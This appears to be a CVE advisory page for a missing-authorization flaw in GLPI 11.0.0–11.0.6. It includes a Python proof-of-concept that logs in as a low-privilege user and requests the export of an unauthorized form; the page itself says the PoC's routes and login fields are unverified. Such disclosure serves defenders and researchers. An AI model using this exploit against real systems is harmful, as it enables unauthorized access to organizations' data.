Security Vulnerability Report
CVE-2026-32312 CVSS 4.3 MEDIUM

CVE-2026-32312

Published: 2026-05-19 00:16:37
Last Modified: 2026-05-21 23:57:49

Description

GLPI is a free asset and IT management software package. In versions 11.0.0 through 11.0.6, an authenticated user with forms READ permission can export the structure of unauthorized forms (an object-level authorization gap; NVD classifies it as CWE-862, Missing Authorization). This issue has been fixed in version 11.0.7; the fix requires upgrading, as no workaround is listed.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* - VULNERABLE
GLPI 11.0.0
GLPI 11.0.1
GLPI 11.0.2
GLPI 11.0.3
GLPI 11.0.4
GLPI 11.0.5
GLPI 11.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It needs valid credentials for a low-privilege account that holds forms READ permission, and its login and export routes are taken from the PoC author's notes, not confirmed against a real GLPI 11.0.x install — treat a "[-]" result as inconclusive until the routes are verified.
python
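import argparse

import requests


def exploit_glpi_cve(target, username, password, form_id, timeout=15):
    """PoC for CVE-2026-32312: unauthorized form structure export in GLPI 11.0.0-11.0.6.

    Logs in as a low-privilege account (forms READ permission only) and then
    requests the export of a form that account is not authorized to read.

    Args:
        target: Base URL of the GLPI install, e.g. ``http://127.0.0.1/glpi``.
        username: Login name of the low-privilege account.
        password: Password of that account.
        form_id: ID of a form the account should NOT be able to read.
        timeout: Per-request timeout in seconds so an unresponsive host cannot
            hang the run indefinitely.

    Returns:
        True when the export request returned HTTP 200 and the body looks like
        a form structure rather than a login page, False otherwise.
    """
    base = target.rstrip("/")
    session = requests.Session()

    # 1. Authentication.
    # NOTE(review): these field names are inherited from the original PoC and
    # are not verified against GLPI 11's login form (which may carry a CSRF
    # token or version-specific field names) — confirm against /front/login.php.
    login_url = f"{base}/front/login.php"
    auth_data = {
        "login_name": username,
        "login_password": password,
        "submit": "Post",
    }
    login_resp = session.post(login_url, data=auth_data, timeout=timeout)
    # The original ignored the login response, so a failed login surfaced as a
    # misleading "access denied" verdict on the export step. Treat an HTTP
    # error, or a reply that still contains the login form, as a login failure.
    if not login_resp.ok or "login_password" in login_resp.text:
        print(f"[-] Login failed (HTTP {login_resp.status_code}); check credentials/CSRF handling.")
        return False

    # 2. Export attempt on a form the user is not authorized to read.
    # NOTE(review): the route is the original PoC's guess ("typically
    # /front/form.form.php") and may vary by GLPI configuration/version.
    export_url = f"{base}/front/form.form.php"
    params = {
        "action": "export",  # Action that triggers the export
        "id": form_id,  # Target form ID the user should not have access to
    }
    response = session.get(export_url, params=params, timeout=timeout)

    # A 200 alone is weak evidence: an application-level denial or redirect to
    # the login form can also come back as 200 HTML. The original matched the
    # substring "structure" anywhere in the body, which also matches arbitrary
    # page text; require it together with the absence of the login form.
    body = response.text
    exported = (
        response.status_code == 200
        and "structure" in body
        and "login_password" not in body
    )
    if exported:
        print(f"[+] Successfully exported form ID {form_id}:")
        print(body[:500])  # First 500 chars are enough to confirm the leak
    else:
        print(f"[-] Failed to export form or access denied (HTTP {response.status_code}).")
    return exported


if __name__ == "__main__":
    # Defaults match the original hard-coded values so a bare run behaves the
    # same; they are placeholders, not real credentials.
    parser = argparse.ArgumentParser(description="PoC for CVE-2026-32312 (GLPI form export)")
    parser.add_argument("--target", default="http://127.0.0.1/glpi", help="GLPI base URL")
    parser.add_argument("--user", default="low_priv_user", help="Low-privilege login name")
    parser.add_argument("--password", default="user_pass", help="Password for that account")
    parser.add_argument("--form-id", default="2", help="ID of a form the user must not be able to read")
    args = parser.parse_args()
    exploit_glpi_cve(args.target, args.user, args.password, args.form_id)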

References

- https://github.com/glpi-project/glpi/releases/tag/11.0.7 (Release Notes)
- https://github.com/glpi-project/glpi/security/advisories/GHSA-cg63-qchq-q626 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32312", "sourceIdentifier": "[email protected]", "published": "2026-05-19T00:16:37.283", "lastModified": "2026-05-21T23:57:48.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GLPI is a free asset and IT management software package. In versions 11.0.0 through 11.0.6, an authenticated user with forms READ permission can export the structure of unauthorized forms. This issue has been fixed in version 11.0.7."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", 
"providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.7", "matchCriteriaId": "309CFFFD-1C2C-461B-887E-0C5380CA9618"}]}]}], "references": [{"url": "https://github.com/glpi-project/glpi/releases/tag/11.0.7", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/glpi-project/glpi/security/advisories/GHSA-cg63-qchq-q626", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}